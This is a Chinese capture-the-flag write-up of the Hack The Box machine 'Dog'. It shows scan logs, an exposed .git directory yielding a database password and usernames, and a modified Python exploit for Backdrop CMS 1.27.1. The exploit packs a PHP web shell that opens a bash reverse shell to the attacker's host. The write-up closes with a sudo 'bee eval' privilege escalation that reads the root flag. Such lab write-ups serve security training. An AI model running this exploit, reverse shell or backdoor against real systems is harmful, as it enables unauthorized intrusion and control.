HTB——Dog
0x01 信息收集
老规矩,Tscan+fscan组合拳库库扫,先看能不能扫点信息出来。
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-31 23:44:57] [INFO] 暴力破解线程数: 1
[2025-03-31 23:44:57] [INFO] 开始信息扫描
[2025-03-31 23:44:57] [INFO] 最终有效主机数量: 1
[2025-03-31 23:44:57] [INFO] 开始主机扫描
[2025-03-31 23:44:57] [INFO] 有效端口数量: 233
[2025-03-31 23:44:58] [SUCCESS] 端口开放 10.129.244.41:80
[2025-03-31 23:44:58] [SUCCESS] 端口开放 10.129.244.41:22
[2025-03-31 23:44:58] [SUCCESS] 服务识别 10.129.244.41:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.12 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12.]
[2025-03-31 23:45:05] [SUCCESS] 服务识别 10.129.244.41:80 => [http]
[2025-03-31 23:45:05] [INFO] 存活端口数量: 2
[2025-03-31 23:45:05] [INFO] 开始漏洞扫描
[2025-03-31 23:45:05] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-31 23:45:05] [SUCCESS] 网站标题 http://10.129.244.41 状态码:200 长度:13368 标题:Home | Dog
[2025-03-31 23:45:05] [SUCCESS] 发现指纹 目标: http://10.129.244.41 指纹: [CMS]
[2025-03-31 23:45:30] [SUCCESS] 扫描已完成: 3/3
_____ ___ _
/__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___
/ /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __|
/ / \__ \| (__ | (_| || | | |/ ___/ | || |_| |\__ \
\/ |___/ \___| \__,_||_| |_|\/ |_| \__,_||___/
https://github.com/TideSec/TscanPlus
TscanClient Version: 2.7.4 NewVersion: 2.7.5 Expired: 2026.01.01
[23:50:07] [INFO] Start IpScan:10.129.244.41
[23:50:07] [INFO] 开始扫描 1 个主机的 65535 个端口,共 65535 个任务
端口扫描 0% [░░░░░░░░░░░░░░░░░░░░] (14/65535) [0s:19m47s][23:50:08] [+] 10.129.244.41:22 open
[23:50:08] [+] 10.129.244.41:80 open
[23:50:08] [+] [TCP/SSH] [OpenSSH 8.2p1 Ubuntu 4ubuntu0.12] 10.129.244.41:22 [SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12]
[23:50:08] [INFO] start SSH check 10.129.244.41:22
[23:50:08] [+] 开始 SshScan 任务: SSH://10.129.244.41:22
[23:50:09] [+] [TCP/HTTP] [200] [Apache/2.4.41 (Ubuntu)][Apache-Web-Server][Apache-HTTP-Server/2.4.41][panabit智能网关][jQuery] http://10.129.244.41:80 [Home | Dog]
[23:50:25] [+] alive ports is: 2
[23:50:25] [+] Ip扫描结束:10.129.244.41
[23:50:25] [INFO] Start UrlScan:http://10.129.244.41:80
[23:50:26] [+] [TCP/HTTP] [200] [Apache-HTTP-Server/2.4.41][Apache/2.4.41 (Ubuntu)][jQuery][Apache-Web-Server][panabit智能网关] http://10.129.244.41:80 [Home | Dog]
[23:50:26] [+] Url扫描结束:http://10.129.244.41:80
[23:50:26] [+] 项目任务完成:Default, Timeuse:18.891383758
[23:50:26] [+] 扫描结束,耗时: 19.692145367s
只扫出了80端口和22端口。我们先尝试探测HTTP服务。观察到HTTP服务搭建了Backdrop CMS服务。首先尝试登录端的sql注入,发现没有任何作用。考虑到直接给到了CMS名称,我们再尝试搜一下Backdrop CMS的exploit。并且同时扫一下后台。
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/HTB/Dog/reports/http_10.129.244.41/__25-04-01_01-58-16.txt
Target: http://10.129.244.41/
[01:58:17] Starting:
[01:58:21] 200 - 410B - /.git/branches/
[01:58:21] 200 - 605B - /.git/
[01:58:21] 200 - 95B - /.git/COMMIT_EDITMSG
[01:58:21] 200 - 92B - /.git/config
[01:58:21] 200 - 23B - /.git/HEAD
[01:58:21] 200 - 73B - /.git/description
[01:58:21] 200 - 651B - /.git/hooks/
[01:58:21] 200 - 456B - /.git/info/
[01:58:21] 200 - 240B - /.git/info/exclude
[01:58:21] 200 - 477B - /.git/logs/
[01:58:21] 200 - 230B - /.git/logs/HEAD
[01:58:21] 200 - 230B - /.git/logs/refs/heads/master
[01:58:21] 200 - 41B - /.git/refs/heads/master
[01:58:21] 200 - 460B - /.git/refs/
[01:58:21] 200 - 2KB - /.git/objects/
[01:58:22] 200 - 337KB - /.git/index
[01:59:06] 200 - 586B - /files/
[01:59:12] 200 - 4KB - /index.php
[01:59:16] 200 - 456B - /layouts/
[01:59:17] 200 - 7KB - /LICENSE.txt
[01:59:25] 200 - 405B - /modules/
[01:59:40] 200 - 5KB - /README.md
[01:59:41] 200 - 528B - /robots.txt
[01:59:45] 200 - 0B - /settings.php
[01:59:55] 200 - 454B - /themes/
Task Completed
0x02 .git泄露+BackDrop CVE获取shell
经典但很少见的.git泄露,我们使用GitHack尝试利用一下。查看到mysql的配置密码为BackDropJ2024DS2024,我们再在文件中看能不能翻到账户名。尝试一下grep递归搜索。
┌──(root㉿kali)-[/home/…/HTB/Dog/GitHack/10.129.244.41]
└─# grep -rnE '@dog.htb' .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:12: "tiffany@dog.htb"
翻到tiffany账户,我们尝试用此账户+数据库密码登陆一下。搜索BackDrop CMS的exploit,查看到有一个RCE符合版本要求。
┌──(root㉿kali)-[/home/…/HTB/Dog/GitHack/10.129.244.41]
└─# searchsploit backdrop
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
Backdrop CMS 1.20.0 - 'Multiple' Cross-Sit | php/webapps/50323.html
Backdrop CMS 1.23.0 - Stored XSS | php/webapps/51905.txt
Backdrop CMS 1.27.1 - Authenticated Remote | php/webapps/52021.py
Backdrop Cms v1.25.1 - Stored Cross-Site S | php/webapps/51597.txt
------------------------------------------- ---------------------------------
下载exploit查看,注意本题的upload白名单文件从zip改为了tar,我们也要相应的适当修改exploit以符合要求。
import os
import time
import tarfile
def create_files():
info_content = """
type = module
name = Block
description = Controls the visual building blocks a page is constructed
with. Blocks are boxes of content rendered into an area, or region, of a
web page.
package = Layouts
tags[] = Blocks
tags[] = Site Architecture
version = BACKDROP_VERSION
backdrop = 1.x
configure = admin/structure/block
; Added by Backdrop CMS packaging script on 2024-03-07
project = backdrop
version = 1.27.1
timestamp = 1709862662
"""
shell_info_path = "shell/shell.info"
os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)
with open(shell_info_path, "w") as file:
file.write(info_content)
shell_content = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
system("bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/54311 0>&1'");
?>
</pre>
</body>
</html>
"""
shell_php_path = "shell/shell.php"
with open(shell_php_path, "w") as file:
file.write(shell_content)
return shell_info_path, shell_php_path
def create_tar(info_path, php_path):
tar_filename = "shell.tar"
with tarfile.open(tar_filename, "w") as tarf:
tarf.add(info_path, arcname='shell/shell.info')
tarf.add(php_path, arcname='shell/shell.php')
return tar_filename
def main(url):
print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
time.sleep(3)
print("Evil module generating...")
time.sleep(2)
info_path, php_path = create_files()
tar_filename = create_tar(info_path, php_path)
print("Evil module generated!", tar_filename)
time.sleep(2)
print("Go to " + url + "/?q=admin/installer/manual and upload the " +
tar_filename + " for Manual Installation.")
time.sleep(2)
print("Your shell address:", url + "/modules/shell/shell.php")
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print("Usage: python script.py [url]")
else:
main(sys.argv[1])
fan反弹shell后我们留一个antsword后门,连上去后看一下mysql数据库中有无内容。翻到了一下账户与密码hash。我们先去home目录看一下本靶机的登录用户有哪些。
只翻到了这两个b。尝试用之前的数据库密码再登一下,结果johncusack真登上去了。这个用户目录下就有user.txt
0x03 bee提权
使用sudo -l查看账户特权,找到一个bee命令。网上搜不到提权指令,只能自己看看这玩意是干嘛的了。
johncusack@dog:~$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
指定Backdrop的运行目录并使用sudo命令,就可以使用root身份做任何事情了。
johncusack@dog:~$ sudo bee --root=/var/www/html eval "system('cat /root/root.txt');"
57a494e6db07d5254624f6cda5b0e52c
0x04 总结
很基础的一台靶机,不愧于其easy的难度分级,总算是能给我爽打了。